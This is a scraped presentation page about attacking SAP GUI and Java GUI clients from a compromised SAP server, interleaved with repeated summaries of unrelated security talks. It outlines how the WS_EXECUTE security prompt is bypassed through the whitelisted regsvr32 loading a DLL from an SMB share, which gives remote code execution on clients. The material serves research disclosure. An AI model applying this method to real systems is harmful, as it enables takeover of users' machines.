In this presentation, we will demonstrate how attackers can compromise all SAP clients and gain private information from their machines by using the SAP server.
What You Need to Know About Web App Security Testing in 2018Ken DeSouza
See the associated webinar via https://www.softwaretestpro.com/what-you-need-to-know-about-web-app-security-testing-in-2018/ (there is a youtube link here)
Practical Application of the API Security Top Ten: A Tester's PerspectiveRajniHatti
This document discusses API security testing from the perspective of a tester. It provides examples of API calls to Twitter and the types of tests that should be performed, such as testing for injection, broken authorization, rate limiting, and improper asset management. The document emphasizes the importance of listening, learning and looking to contribute to API security.
This document discusses various ways that geolocation capabilities in mobile apps can leak users' private location data if not implemented securely. It provides examples of common geolocation bugs like insecure network communication, insecure local storage of location data, location spoofing, over-collection of precise location coordinates, and user interface errors. The document also demonstrates how these bugs can be discovered through network sniffing, file monitoring, runtime manipulation of location data, and disassembly analysis of app code.
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack
The document discusses geolocation features in mobile apps and potential security issues. It provides an overview of how geolocation works on iOS, code examples for implementing geolocation in Swift, and discusses common classes of geolocation bugs that could compromise a user's location privacy. These include insecure network communications, insecure local storage of location data, location spoofing, collecting overly precise location data, and user interface errors.
Web Application Penetration Testing - 101Andrea Hauser
This document provides an overview of web application pentesting. It discusses preparations like setting up reporting and tools. The methodology involves reconnaissance, automated testing, and manual testing. Technical topics covered include the OWASP Top 10 vulnerabilities like injection, broken authentication, sensitive data exposure, and cross-site scripting. Examples are provided and recommendations on prevention. Tutorial resources like PortSwigger and OWASP Juice Shop are referenced.
This document discusses developing an automatic classification system for web-based malware using machine learning. It describes collecting malware and clean web files, extracting features from the files, analyzing the data and selecting a classifier. Key features extracted include the use of external scripts, script blocks, constant obfuscation, meta redirects, modifying the location href and using hidden attributes. The goal is to train a machine learning classifier on these features to detect malware versus clean web pages.
Introduction to Web Application Penetration TestingRana Khalil
Intro to web application penetration testing workshop I held in Atlanta as part of the AnitaBorg Cybersecurity Weekend on Aug. 19. The link for the event can be found here: https://community.anitab.org/event/atl-cybersecurity-day-two/
This document provides a summary of key Volatility plugins and memory analysis steps. It outlines plugins for identifying rogue processes, analyzing process DLLs and handles, reviewing network artifacts, checking for code injection evidence, looking for rootkit signs, and dumping suspicious processes/drivers. The document also provides information on memory acquisition, converting hibernation files and dumps, artifact timelining, and registry analysis plugins.
What You Need to Know About Web App Security Testing in 2018Ken DeSouza
See the associated webinar via https://www.softwaretestpro.com/what-you-need-to-know-about-web-app-security-testing-in-2018/ (there is a youtube link here)
Practical Application of the API Security Top Ten: A Tester's PerspectiveRajniHatti
This document discusses API security testing from the perspective of a tester. It provides examples of API calls to Twitter and the types of tests that should be performed, such as testing for injection, broken authorization, rate limiting, and improper asset management. The document emphasizes the importance of listening, learning and looking to contribute to API security.
This document discusses various ways that geolocation capabilities in mobile apps can leak users' private location data if not implemented securely. It provides examples of common geolocation bugs like insecure network communication, insecure local storage of location data, location spoofing, over-collection of precise location coordinates, and user interface errors. The document also demonstrates how these bugs can be discovered through network sniffing, file monitoring, runtime manipulation of location data, and disassembly analysis of app code.
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack
The document discusses geolocation features in mobile apps and potential security issues. It provides an overview of how geolocation works on iOS, code examples for implementing geolocation in Swift, and discusses common classes of geolocation bugs that could compromise a user's location privacy. These include insecure network communications, insecure local storage of location data, location spoofing, collecting overly precise location data, and user interface errors.
Web Application Penetration Testing - 101Andrea Hauser
This document provides an overview of web application pentesting. It discusses preparations like setting up reporting and tools. The methodology involves reconnaissance, automated testing, and manual testing. Technical topics covered include the OWASP Top 10 vulnerabilities like injection, broken authentication, sensitive data exposure, and cross-site scripting. Examples are provided and recommendations on prevention. Tutorial resources like PortSwigger and OWASP Juice Shop are referenced.
This document discusses developing an automatic classification system for web-based malware using machine learning. It describes collecting malware and clean web files, extracting features from the files, analyzing the data and selecting a classifier. Key features extracted include the use of external scripts, script blocks, constant obfuscation, meta redirects, modifying the location href and using hidden attributes. The goal is to train a machine learning classifier on these features to detect malware versus clean web pages.
Introduction to Web Application Penetration TestingRana Khalil
Intro to web application penetration testing workshop I held in Atlanta as part of the AnitaBorg Cybersecurity Weekend on Aug. 19. The link for the event can be found here: https://community.anitab.org/event/atl-cybersecurity-day-two/
This document provides a summary of key Volatility plugins and memory analysis steps. It outlines plugins for identifying rogue processes, analyzing process DLLs and handles, reviewing network artifacts, checking for code injection evidence, looking for rootkit signs, and dumping suspicious processes/drivers. The document also provides information on memory acquisition, converting hibernation files and dumps, artifact timelining, and registry analysis plugins.
This document provides techniques for escalating privileges on Windows systems. It begins with an overview of tricks that can grant escalated privileges to users or administrators. Specific techniques discussed include exploiting misconfigurations, using keyloggers, searching for credentials on systems, exploiting Group Policy Preferences files, unattended installation files, Windows Deployment Services, binary path modifications, service configuration issues, and registry permissions problems. The document then covers methods for escalating from an administrative user to SYSTEM level privileges like using Metasploit exploits, Sysinternals tools, binary replacement, and WMIC. It concludes with sections on achieving persistence and bypassing authentication.
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Purple Teaming With Adversary Emulation.pdfprithaaash
Adversary emulation involves leveraging your Red Teams to use real-world adversary tactics, techniques and procedures (TTPs), alongside attack frameworks such as MITRE ATT&CK to: Identify control gaps (and weaknesses); Validate your monitoring, detection and response capabilities; Prioritising your security investments towards mitigating any shortcoming that may be observed using this approach.
These are the slides from the defcon talk title 'The making of 2nd sql injection worm'. Refer to the video presentations uploaded on www.notsosecure.com.
PowerShell is often considered a threat vector by security tools like Carbon Black due to its powerful capabilities. However, the presentation argues that PowerShell is not dead and outlines ways attackers have evolved their PowerShell techniques to avoid detection. It demonstrates a C# PowerShell implant that uses reflection to bypass detection and discusses exploiting COM objects and Junction folders to migrate between processes like Internet Explorer."
Application Security from the Inside - OWASPSqreen
Presentation at the OWASP (Open Web Application Security Project) on how to make apps secure by protecting them from the inside.
Detecting and protecting from
1. SQL injection
2. Cross Site Scripting (XSS)
3. Third party components vulnerabilities
4. Shell injection
etc.
This document discusses using non-standard command and control (C2) channels to bypass network segmentation. It describes how VMware APIs, printers, RDP mapped drives, and LDAP attributes can be leveraged as C2 channels. Detection opportunities for each technique are also provided, such as monitoring API logs, print server event logs, module loads, and file writes. The document aims to help blue teams challenge network boundaries and red teams evade detection.
New and improved hacking oracle from web apps sumit sidharthowaspindia
This document discusses hacking Oracle databases from web applications. It describes how SQL injection vulnerabilities in web apps connected to Oracle databases can be used to escalate privileges and execute operating system commands. Specifically, it outlines how the dbms_xmlquery.newcontext() and dbms_xmlquery.getxml() functions allow executing arbitrary PL/SQL, which can then exploit other vulnerabilities to gain DBA access privileges and run operating system code. Examples are provided that demonstrate exploiting vulnerabilities to gain DBA privileges and executing Metasploit payloads on the database server.
The document describes experiments related to system security and digital forensics.
The first experiment involves using static code analysis tools like RATS and Flawfinder to analyze code samples for vulnerabilities. The second experiment describes installing and using the vulnerability scanner Nessus to scan systems for known vulnerabilities.
The third experiment explores using the website copier HTTrack to download a website from the internet to a local directory while preserving the directory structure and links. The fourth experiment demonstrates configuring router security using passwords and access lists on Cisco Packet Tracer to filter traffic between VLANs and networks.
The bare minimum that you should know about web application security testing ...Ken DeSouza
The document provides an overview of common tools and techniques for web application security testing. It discusses STRIDE/DREAD frameworks for threat modeling and identifying vulnerabilities. It also summarizes the OWASP Top 10 list of risks and demonstrates tools like ZAP, Wireshark, SQLMap and tcpdump for analyzing applications, networks and detecting SQL injection flaws. The document advocates threat modeling to explain security issues to various stakeholders and provides references for further reading.
1) The document provides step-by-step instructions for installing Oracle Ops Center 12c, including downloading required files, installing prerequisite packages, running the installer, and completing the initial configuration.
2) It also explains how to add new assets to be managed by Ops Center 12c, which involves creating a discovery profile to define the target systems, credentials, and IP range and initiating a discovery job to identify the targets.
3) Additional features of Ops Center 12c are highlighted such as the ability to manage targets without deploying agents and merged steps for discovering and adding assets.
Public exploit held private : Penetration Testing the researcher’s waytitanlambda
This talk is about how to solve practical challenges faced during pen-testing and exploits. Will help you to understand how it can be done efficiently. Will explore various tips and tricks about it. It will try to solve the common questions like:
0. How do I prepare? What kind of tools I should have?
1. I need to scan the entire network in a faster way?
2. How can I get more accurate results for scanning and fingerprinting?
3. Nessus says it is vulnerable but how can I exploit?
4. What if I know it is vulnerable but I don’t have any exploits available?
5. I am inside the box, compromised it, now what to do?
In short, it will show you the pain points of a typical pen-testing exercise how to deal with it and will help you to reach to “42”, the answer to life, the universe and everything.
I got 99 trends and a # is all of them or How we found over 100 200+ RCE vulnerabilities in Trend Micro software.
Presentation released at Hack In The Box 2017 Amsterdam, by Roberto Suggi Liverani @malerisch and Steven Seeley @steventseeley.
For more information, please visit: http://blog.malerisch.net or http://srcincite.io
Positive Technologies - S4 - Scada under x-raysqqlan
This document summarizes a presentation given by Sergey Gordeychik, Gleb Gritsai, and Denis Baranov on analyzing the security of WinCC SCADA software. It introduces the presenters and their backgrounds in industrial control system security research. They discuss common vulnerabilities found in WinCC like SQL injection, XSS, and password disclosure. The researchers provide an overview of the WinCC architecture and its various components. They analyze vulnerabilities in the WinCC project files and communication protocols. The presentation aims to bring more attention to automating security assessments of industrial control systems.
2009-08-24 The Linux Audit Subsystem Deep DiveShawn Wells
Presented at SHARE Denver 2009. Why is Linux auditing needed? What can it do for me? How does it work? What events get audited? How do I make sense of all the data?
The document provides an overview of web application security testing tools and techniques. It begins with an introduction to common terminology and threats. It then demonstrates various tools for tasks like vulnerability analysis (OWASP ZAP), exploitation (sqlmap), and network analysis (nmap, Wireshark, tcpdump). It also covers topics like the OWASP Top 10, STRIDE/DREAD frameworks, and threat modeling. The document emphasizes that tools should be used thoughtfully alongside security expertise and provides several references for further learning.
This document discusses logging and summarization techniques. It begins with an overview of why logging is important for application development and maintenance. It then covers different types of logs, such as system logs, application logs, and database logs. The document discusses various logging options and frameworks, with a focus on Monolog and the ELK stack. It provides examples of setting up logging with Monolog and sending logs to Elasticsearch using Logstash and viewing them in Kibana. The key aspects covered are the need for logging, different log types, popular logging frameworks and real-time log analysis using ELK.
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
This document provides guidance on securing a web application hosted on a virtual private server (VPS). It discusses selecting secure software like Linux, Nginx, PHP and MySQL. It recommends hosting on a VPS for control over security. Key areas covered include hardening the operating system, configuring the web server, application and database securely, enabling HTTPS, securing remote access via SSH, using a firewall and fail2ban. It also discusses securing backups, accounts with the host and administrator laptop. The document aims to be comprehensive in addressing security at each layer for the web application.
Any structure expected to stand the test of time and change needs a strong foundation! Software is no exception. Engineering your code to grow in a stable and effective way is critical to your ability to rapidly meet the growing demands of users, new features, technologies, and platform capabilities. Join us to obtain architect-level design patterns for use in your Apex code to keep it well factored, easy to maintain, and in line with platform best practices. You'll follow a Force.com interpretation of Martin Fowler's Enterprise Architecture Application patterns, and the practice of Separation of Concerns.
Application and Website Security -- Fundamental EditionDaniel Owens
The document provides an agenda for a course on application and website security. The agenda covers common input validation flaws like SQL injection and cross-site scripting, access control flaws like session hijacking, encryption flaws, security tools, and concludes with additional resources for further information. The document uses examples to demonstrate various security vulnerabilities and how they can be exploited.
This document provides techniques for escalating privileges on Windows systems. It begins with an overview of tricks that can grant escalated privileges to users or administrators. Specific techniques discussed include exploiting misconfigurations, using keyloggers, searching for credentials on systems, exploiting Group Policy Preferences files, unattended installation files, Windows Deployment Services, binary path modifications, service configuration issues, and registry permissions problems. The document then covers methods for escalating from an administrative user to SYSTEM level privileges like using Metasploit exploits, Sysinternals tools, binary replacement, and WMIC. It concludes with sections on achieving persistence and bypassing authentication.
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Purple Teaming With Adversary Emulation.pdfprithaaash
Adversary emulation involves leveraging your Red Teams to use real-world adversary tactics, techniques and procedures (TTPs), alongside attack frameworks such as MITRE ATT&CK to: Identify control gaps (and weaknesses); Validate your monitoring, detection and response capabilities; Prioritising your security investments towards mitigating any shortcoming that may be observed using this approach.
These are the slides from the defcon talk title 'The making of 2nd sql injection worm'. Refer to the video presentations uploaded on www.notsosecure.com.
PowerShell is often considered a threat vector by security tools like Carbon Black due to its powerful capabilities. However, the presentation argues that PowerShell is not dead and outlines ways attackers have evolved their PowerShell techniques to avoid detection. It demonstrates a C# PowerShell implant that uses reflection to bypass detection and discusses exploiting COM objects and Junction folders to migrate between processes like Internet Explorer."
Application Security from the Inside - OWASPSqreen
Presentation at the OWASP (Open Web Application Security Project) on how to make apps secure by protecting them from the inside.
Detecting and protecting from
1. SQL injection
2. Cross Site Scripting (XSS)
3. Third party components vulnerabilities
4. Shell injection
etc.
This document discusses using non-standard command and control (C2) channels to bypass network segmentation. It describes how VMware APIs, printers, RDP mapped drives, and LDAP attributes can be leveraged as C2 channels. Detection opportunities for each technique are also provided, such as monitoring API logs, print server event logs, module loads, and file writes. The document aims to help blue teams challenge network boundaries and red teams evade detection.
New and improved hacking oracle from web apps sumit sidharthowaspindia
This document discusses hacking Oracle databases from web applications. It describes how SQL injection vulnerabilities in web apps connected to Oracle databases can be used to escalate privileges and execute operating system commands. Specifically, it outlines how the dbms_xmlquery.newcontext() and dbms_xmlquery.getxml() functions allow executing arbitrary PL/SQL, which can then exploit other vulnerabilities to gain DBA access privileges and run operating system code. Examples are provided that demonstrate exploiting vulnerabilities to gain DBA privileges and executing Metasploit payloads on the database server.
The document describes experiments related to system security and digital forensics.
The first experiment involves using static code analysis tools like RATS and Flawfinder to analyze code samples for vulnerabilities. The second experiment describes installing and using the vulnerability scanner Nessus to scan systems for known vulnerabilities.
The third experiment explores using the website copier HTTrack to download a website from the internet to a local directory while preserving the directory structure and links. The fourth experiment demonstrates configuring router security using passwords and access lists on Cisco Packet Tracer to filter traffic between VLANs and networks.
The bare minimum that you should know about web application security testing ...Ken DeSouza
The document provides an overview of common tools and techniques for web application security testing. It discusses STRIDE/DREAD frameworks for threat modeling and identifying vulnerabilities. It also summarizes the OWASP Top 10 list of risks and demonstrates tools like ZAP, Wireshark, SQLMap and tcpdump for analyzing applications, networks and detecting SQL injection flaws. The document advocates threat modeling to explain security issues to various stakeholders and provides references for further reading.
1) The document provides step-by-step instructions for installing Oracle Ops Center 12c, including downloading required files, installing prerequisite packages, running the installer, and completing the initial configuration.
2) It also explains how to add new assets to be managed by Ops Center 12c, which involves creating a discovery profile to define the target systems, credentials, and IP range and initiating a discovery job to identify the targets.
3) Additional features of Ops Center 12c are highlighted such as the ability to manage targets without deploying agents and merged steps for discovering and adding assets.
Public exploit held private : Penetration Testing the researcher’s waytitanlambda
This talk is about how to solve practical challenges faced during pen-testing and exploits. Will help you to understand how it can be done efficiently. Will explore various tips and tricks about it. It will try to solve the common questions like:
0. How do I prepare? What kind of tools I should have?
1. I need to scan the entire network in a faster way?
2. How can I get more accurate results for scanning and fingerprinting?
3. Nessus says it is vulnerable but how can I exploit?
4. What if I know it is vulnerable but I don’t have any exploits available?
5. I am inside the box, compromised it, now what to do?
In short, it will show you the pain points of a typical pen-testing exercise how to deal with it and will help you to reach to “42”, the answer to life, the universe and everything.
I got 99 trends and a # is all of them or How we found over 100 200+ RCE vulnerabilities in Trend Micro software.
Presentation released at Hack In The Box 2017 Amsterdam, by Roberto Suggi Liverani @malerisch and Steven Seeley @steventseeley.
For more information, please visit: http://blog.malerisch.net or http://srcincite.io
Positive Technologies - S4 - Scada under x-raysqqlan
This document summarizes a presentation given by Sergey Gordeychik, Gleb Gritsai, and Denis Baranov on analyzing the security of WinCC SCADA software. It introduces the presenters and their backgrounds in industrial control system security research. They discuss common vulnerabilities found in WinCC like SQL injection, XSS, and password disclosure. The researchers provide an overview of the WinCC architecture and its various components. They analyze vulnerabilities in the WinCC project files and communication protocols. The presentation aims to bring more attention to automating security assessments of industrial control systems.
2009-08-24 The Linux Audit Subsystem Deep DiveShawn Wells
Presented at SHARE Denver 2009. Why is Linux auditing needed? What can it do for me? How does it work? What events get audited? How do I make sense of all the data?
The document provides an overview of web application security testing tools and techniques. It begins with an introduction to common terminology and threats. It then demonstrates various tools for tasks like vulnerability analysis (OWASP ZAP), exploitation (sqlmap), and network analysis (nmap, Wireshark, tcpdump). It also covers topics like the OWASP Top 10, STRIDE/DREAD frameworks, and threat modeling. The document emphasizes that tools should be used thoughtfully alongside security expertise and provides several references for further learning.
This document discusses logging and summarization techniques. It begins with an overview of why logging is important for application development and maintenance. It then covers different types of logs, such as system logs, application logs, and database logs. The document discusses various logging options and frameworks, with a focus on Monolog and the ELK stack. It provides examples of setting up logging with Monolog and sending logs to Elasticsearch using Logstash and viewing them in Kibana. The key aspects covered are the need for logging, different log types, popular logging frameworks and real-time log analysis using ELK.
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
This document provides guidance on securing a web application hosted on a virtual private server (VPS). It discusses selecting secure software like Linux, Nginx, PHP and MySQL. It recommends hosting on a VPS for control over security. Key areas covered include hardening the operating system, configuring the web server, application and database securely, enabling HTTPS, securing remote access via SSH, using a firewall and fail2ban. It also discusses securing backups, accounts with the host and administrator laptop. The document aims to be comprehensive in addressing security at each layer for the web application.
Any structure expected to stand the test of time and change needs a strong foundation! Software is no exception. Engineering your code to grow in a stable and effective way is critical to your ability to rapidly meet the growing demands of users, new features, technologies, and platform capabilities. Join us to obtain architect-level design patterns for use in your Apex code to keep it well factored, easy to maintain, and in line with platform best practices. You'll follow a Force.com interpretation of Martin Fowler's Enterprise Architecture Application patterns, and the practice of Separation of Concerns.
Application and Website Security -- Fundamental EditionDaniel Owens
The document provides an agenda for a course on application and website security. The agenda covers common input validation flaws like SQL injection and cross-site scripting, access control flaws like session hijacking, encryption flaws, security tools, and concludes with additional resources for further information. The document uses examples to demonstrate various security vulnerabilities and how they can be exploited.
Similar to SAP strikes back Your SAP server now counter attacks. (20)
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...Crescat
Crescat is industry-trusted event management software, built by event professionals for event professionals. Founded in 2017, we have three key products tailored for the live event industry.
Crescat Event for concert promoters and event agencies. Crescat Venue for music venues, conference centers, wedding venues, concert halls and more. And Crescat Festival for festivals, conferences and complex events.
With a wide range of popular features such as event scheduling, shift management, volunteer and crew coordination, artist booking and much more, Crescat is designed for customisation and ease-of-use.
Over 125,000 events have been planned in Crescat and with hundreds of customers of all shapes and sizes, from boutique event agencies through to international concert promoters, Crescat is rigged for success. What's more, we highly value feedback from our users and we are constantly improving our software with updates, new features and improvements.
If you plan events, run a venue or produce festivals and you're looking for ways to make your life easier, then we have a solution for you. Try our software for free or schedule a no-obligation demo with one of our product specialists today at crescat.io
Need for Speed: Removing speed bumps from your Symfony projects ⚡️Łukasz Chruściel
No one wants their application to drag like a car stuck in the slow lane! Yet it’s all too common to encounter bumpy, pothole-filled solutions that slow the speed of any application. Symfony apps are not an exception.
In this talk, I will take you for a spin around the performance racetrack. We’ll explore common pitfalls - those hidden potholes on your application that can cause unexpected slowdowns. Learn how to spot these performance bumps early, and more importantly, how to navigate around them to keep your application running at top speed.
We will focus in particular on tuning your engine at the application level, making the right adjustments to ensure that your system responds like a well-oiled, high-performance race car.
Using Query Store in Azure PostgreSQL to Understand Query PerformanceGrant Fritchey
Microsoft has added an excellent new extension in PostgreSQL on their Azure Platform. This session, presented at Posette 2024, covers what Query Store is and the types of information you can get out of it.
8 Best Automated Android App Testing Tool and Framework in 2024.pdfkalichargn70th171
Regarding mobile operating systems, two major players dominate our thoughts: Android and iPhone. With Android leading the market, software development companies are focused on delivering apps compatible with this OS. Ensuring an app's functionality across various Android devices, OS versions, and hardware specifications is critical, making Android app testing essential.
SMS API Integration in Saudi Arabia| Best SMS API ServiceYara Milbes
Discover the benefits and implementation of SMS API integration in the UAE and Middle East. This comprehensive guide covers the importance of SMS messaging APIs, the advantages of bulk SMS APIs, and real-world case studies. Learn how CEQUENS, a leader in communication solutions, can help your business enhance customer engagement and streamline operations with innovative CPaaS, reliable SMS APIs, and omnichannel solutions, including WhatsApp Business. Perfect for businesses seeking to optimize their communication strategies in the digital age.
Unveiling the Advantages of Agile Software Development.pdfbrainerhub1
Learn about Agile Software Development's advantages. Simplify your workflow to spur quicker innovation. Jump right in! We have also discussed the advantages.
Microservice Teams - How the cloud changes the way we workSven Peters
A lot of technical challenges and complexity come with building a cloud-native and distributed architecture. The way we develop backend software has fundamentally changed in the last ten years. Managing a microservices architecture demands a lot of us to ensure observability and operational resiliency. But did you also change the way you run your development teams?
Sven will talk about Atlassian’s journey from a monolith to a multi-tenanted architecture and how it affected the way the engineering teams work. You will learn how we shifted to service ownership, moved to more autonomous teams (and its challenges), and established platform and enablement teams.
SOCRadar's Aviation Industry Q1 Incident Report is out now!
The aviation industry has always been a prime target for cybercriminals due to its critical infrastructure and high stakes. In the first quarter of 2024, the sector faced an alarming surge in cybersecurity threats, revealing its vulnerabilities and the relentless sophistication of cyber attackers.
SOCRadar’s Aviation Industry, Quarterly Incident Report, provides an in-depth analysis of these threats, detected and examined through our extensive monitoring of hacker forums, Telegram channels, and dark web platforms.
GraphSummit Paris - The art of the possible with Graph TechnologyNeo4j
Sudhir Hasbe, Chief Product Officer, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Transform Your Communication with Cloud-Based IVR SolutionsTheSMSPoint
Discover the power of Cloud-Based IVR Solutions to streamline communication processes. Embrace scalability and cost-efficiency while enhancing customer experiences with features like automated call routing and voice recognition. Accessible from anywhere, these solutions integrate seamlessly with existing systems, providing real-time analytics for continuous improvement. Revolutionize your communication strategy today with Cloud-Based IVR Solutions. Learn more at: https://thesmspoint.com/channel/cloud-telephony
What is Master Data Management by PiLog Groupaymanquadri279
PiLog Group's Master Data Record Manager (MDRM) is a sophisticated enterprise solution designed to ensure data accuracy, consistency, and governance across various business functions. MDRM integrates advanced data management technologies to cleanse, classify, and standardize master data, thereby enhancing data quality and operational efficiency.
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j
Dr. Jesús Barrasa, Head of Solutions Architecture for EMEA, Neo4j
Découvrez les dernières innovations de Neo4j, et notamment les dernières intégrations cloud et les améliorations produits qui font de Neo4j un choix essentiel pour les développeurs qui créent des applications avec des données interconnectées et de l’IA générative.
UI5con 2024 - Keynote: Latest News about UI5 and it’s EcosystemPeter Muessig
Learn about the latest innovations in and around OpenUI5/SAPUI5: UI5 Tooling, UI5 linter, UI5 Web Components, Web Components Integration, UI5 2.x, UI5 GenAI.
Recording:
https://www.youtube.com/live/MSdGLG2zLy8?si=INxBHTqkwHhxV5Ta&t=0
Measures in SQL (SIGMOD 2024, Santiago, Chile)Julian Hyde
SQL has attained widespread adoption, but Business Intelligence tools still use their own higher level languages based upon a multidimensional paradigm. Composable calculations are what is missing from SQL, and we propose a new kind of column, called a measure, that attaches a calculation to a table. Like regular tables, tables with measures are composable and closed when used in queries.
SQL-with-measures has the power, conciseness and reusability of multidimensional languages but retains SQL semantics. Measure invocations can be expanded in place to simple, clear SQL.
To define the evaluation semantics for measures, we introduce context-sensitive expressions (a way to evaluate multidimensional expressions that is consistent with existing SQL semantics), a concept called evaluation context, and several operations for setting and modifying the evaluation context.
A talk at SIGMOD, June 9–15, 2024, Santiago, Chile
Authors: Julian Hyde (Google) and John Fremlin (Google)
https://doi.org/10.1145/3626246.3653374
E-commerce Development Services- Hornet DynamicsHornet Dynamics
For any business hoping to succeed in the digital age, having a strong online presence is crucial. We offer Ecommerce Development Services that are customized according to your business requirements and client preferences, enabling you to create a dynamic, safe, and user-friendly online store.
DDS Security Version 1.2 was adopted in 2024. This revision strengthens support for long runnings systems adding new cryptographic algorithms, certificate revocation, and hardness against DoS attacks.
Graspan: A Big Data System for Big Code AnalysisAftab Hussain
We built a disk-based parallel graph system, Graspan, that uses a novel edge-pair centric computation model to compute dynamic transitive closures on very large program graphs.
We implement context-sensitive pointer/alias and dataflow analyses on Graspan. An evaluation of these analyses on large codebases such as Linux shows that their Graspan implementations scale to millions of lines of code and are much simpler than their original implementations.
These analyses were used to augment the existing checkers; these augmented checkers found 132 new NULL pointer bugs and 1308 unnecessary NULL tests in Linux 4.4.0-rc5, PostgreSQL 8.3.9, and Apache httpd 2.2.18.
- Accepted in ASPLOS ‘17, Xi’an, China.
- Featured in the tutorial, Systemized Program Analyses: A Big Data Perspective on Static Analysis Scalability, ASPLOS ‘17.
- Invited for presentation at SoCal PLS ‘16.
- Invited for poster presentation at PLDI SRC ‘16.
3. How to get admin privilages in SAP?
Over 500+ companies has vulnerable CTC servlet (RCE, 2011 year)
***
3 Java serialization exploits (RCE without authorization 2015)
Information disclosure + SQL injection + CryptoIssue + MissConfig = RCE (Blackhat 2016)
DoS + DoS + RaceCondition + AuthBypass = RCE (Troopers 2016)
Anon Directory Traversal + Escalation Privileges = RCE ( we waiting to fix)
4. Minimum impact
To compromise SAP need to find some vulnerability or their chain of vulnerability to read
SecStore.properties and SecStore.key to obtain administrator user with SAP_ALL privilages
To elevate privileges and gain access to the system from SAP user or root
11. SAP GUI
motivation
11
Goal: attack SAP users from compromised SAP server
While executing transaction “DBACockpit” to manage database SAP GUI we noticed
that SAP GUI offers to open the database management program
After clicking on the web browser button, SAP GUI launched the IE browser and
opened the URL without any security notification .
Interesting! Maybe we can start any program on the client’s
computer…
16. We had 4 ways
How to disable security prompt
Open some URL with
vulnerable/malicious
ActiveX using IE
Analyze sapfesec.dll
which uses SAP GUI to
draw prompt
Search vulnerability in
whitelist EXE files
35. SAP JAVA GUI 35
• Works great on SAP GUI
• What about SAP JAVA GUI?
36. SAP JAVA GUI
Trust levels
36
• When a client connects to the server for the first time a trust level for the SAP server
should be defined
37. SAP JAVA GUI
Trust levels
37
• Productive
• We can execute any program on a client’s computer without user interaction
• Untrusted
• We can’t execute a program on a client’s computer
• BUT it is possible to connect a user to another SAP server
39. SAP JAVA GUI
RCE
39
• Productive
• just execute any program via WS_EXECUTE
• Untrusted
• connect user on productive system
• execute any program via WS_EXECUTE
44. One type of malware
Most popular ransomwares - CryptoLocker, TorrentLocker, CryptoWall, Fusob (for mobile)
Initial ransom start $150 to $2.000 (Cryptomix)
ransomware
Here is our agenda for today.
We’ll start with a brief review on the most common and critical vulnerabilities in SAP. These vulnerabilities give an opportunity to access and compromise critical business data.
Then we’ll watch a clip about the string of vulnerabilities presented a year ago at Troopers 2016 and discuss what exactly attacker can do when they find and exploit SAP vulnerabilities.
In addition, we'll reveal our reasons to conduct this research and watch a clip about exploitation of this vulnerability.
And we have a bonus video for you.
Now, let us analyze the vulnerabilities we’ve managed to find.
One of the most critical vulnerabilities, which Remote Code execution, was detected in 2011. It allows any unauthorized user to easily execute an OS command via web browser. Although the vulnerability had been detected 6 years ago, it was successfully used by some Asian hackers in 2016. Till the present day the Internet is scanned for the given vulnerability.
It’s also worth mentioning that last year, after we had learnt about the vulnerability, we scanned the Internet as well and found out that the number of companies, which hadn’t fixed it, exceeds 500.
To obtain critical information from SAP, attackers/pentesters, it is necessary for them to find a vulnerability in SAP which would give the contents of the file sector. Administrator password scheme (with a password) to access the SAP database is stored in these files. But then I got access application administrator SAP, find and remember exploited vulnerability in another component which will give the system access to SAP.
Now it’s time to have a look at a common work scheme of SAP. With help of SAP GUI users connect to SAP server and do their work.
Let’s consider a situation when an attacker obtains information about SAP, exploits a vulnerability, e.g. in sap gateway or sap disp+work, and accessed SAP database.
While pentesting, we finished at accessing SAP database stage, but today we suggest to go further.
Here is a demo from the previous Troopers conference
So, why did we decide to make this research? It’s no secret that there are a lot transactions, functions and applications, which allows managing and monitoring system, and viewing logs, in SAP.
Once again, we executed the dbacookipit transaction and saw this important database management functionality.
SAP GUI requested a path to open database management program from us. When we want to start with web browser button, SAP GUI without any security notification launched the IE browser and opened the URL. So, we decided to create a special ABAP program with use we can execute any program on target computers. When the research was finished we detected the simplest and the most common wat to start programs on a client’s computer, which is WS_EXECUTE function.
However, when we tried launching calculator with help of ws_exewcute we got a warning message “Do you allow SAP GUI to start calc on your computer?”
It is not what we actually wanted to do. So, the next question is: “How to bypass this message?”
We thought, “It’s worth searching in google. Perhaps, there was someone, who has found out how to turn the message off.” Yeap, there was. Actually we found a whole bunch of forum replies about disabling the message by changing Windows register. However, none of them was suitable for us, because we just couldn’t change register keys remotely. Moreover, the solution wasn’t applicable to newer SAP GUI versions.
Still, there was 4 other ways to solve the problem.
To open a special Url, which will use vulnerable ActiveX, in IЕxplorer
To analyse how sap gui makes a nagscreen with help of sapfesec.dll.
Find a vulnerability in whitelist (we’ll speak about this option a bit later)
And the 4th one…well, one doesn’t even want to consider it…:D
However, on the first stage of researching ActiveX method dropped out. So, we proceeded with the 2nd one.
As it was mentioned before, SAP Security prompt is rendered in the sapfesec.dll file. Analyzing this file we learnt that, if applications stored in SAP GUI directory with certain names, SAP Security prompt won’t appear. Thus, we went on researching with this method.
Mhmm…have you noticed that there is Regsvr32 – file – read,write,execute record in whitelist.
I.e. if this file is called from OS Windows, SAP GUI will show no alerts and a file will be executed. Nonetheless, regsvr32 is an OS Windows file, which is required for a stable operating of system, as well as installing and managing dll-files.
Regsvr32 is launched with predefined arguments, with path to a dll file as a mandatory one. A common dll responsible for launching calc looks this way:
***It should be checked which of these functions will be first to finish its work.
It appears that a software written on ABAP and responsible for arbitrarz code processing on a target system will have the following form. Here smb_share is a public data storage, where our dll. With a malicious code will be put into.
Let's consider a hypothetic situation: what would happen if an attacker found the vulnerability.
